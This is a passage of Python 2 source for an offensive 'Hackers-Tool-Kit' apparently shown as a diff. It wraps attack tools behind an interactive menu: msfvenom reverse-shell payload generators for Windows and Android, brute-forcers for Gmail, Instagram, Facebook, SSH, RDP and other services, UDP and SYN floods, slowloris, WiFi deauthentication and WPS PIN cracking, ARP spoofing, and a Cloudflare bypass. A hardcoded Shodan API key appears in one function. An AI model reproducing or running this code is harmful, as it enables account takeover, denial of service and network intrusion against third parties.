a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ 